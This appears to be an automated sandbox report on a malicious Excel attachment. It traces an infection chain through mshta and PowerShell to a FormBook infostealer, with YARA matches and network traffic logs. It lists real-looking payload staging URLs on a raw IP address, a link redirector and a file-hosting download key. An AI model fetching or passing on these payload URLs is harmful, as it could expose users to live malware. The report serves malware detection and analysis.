              Source: mshta.exe, 00000004.00000002.428991185.0000000000215000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaes
              Source: mshta.exe, 00000004.00000003.422140818.0000000000246000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.0000000000234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlig
              Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligM
              Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlight=delicious&middleman=magenta&span
              Source: mshta.exe, 00000004.00000002.428991185.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423819561.000000000027A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl
              Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0
              Source: mshta.exe, 00000004.00000003.424465133.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477594766.0000000002BB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htahttp://146.70.113.200/231/dnv/seemebestt
              Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/seethe
              Source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.490184350.000000001ABAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF
              Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFp
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.450756599.000000001A782000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 00000013.00000002.490602752.000000001C251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
              Source: powershell.exe, 00000008.00000002.448366945.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: powershell.exe, 00000008.00000002.448366945.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.507185245.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: powershell.exe, 0000000D.00000002.507185245.00000000022C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com
              Source: powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/
              Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/H
              Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/L
              Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, PO#BBGR2411PO69.xls, 09230000.0.drString found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty
              Source: mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&s
              Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/S
              Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/r
              Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/v
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
              Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
              Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
              Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Excel sheet contains many unusual embedded objects
              Source: PO#BBGR2411PO69.xlsOLE: Microsoft Excel 2007+
              Source: PO#BBGR2411PO69.xlsOLE: Microsoft Excel 2007+
              Source: 09230000.0.drOLE: Microsoft Excel 2007+
              Source: 09230000.0.drOLE: Microsoft Excel 2007+
              Microsoft Office drops suspicious files
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].htaJump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Wscript starts Powershell (via cmd or directly)
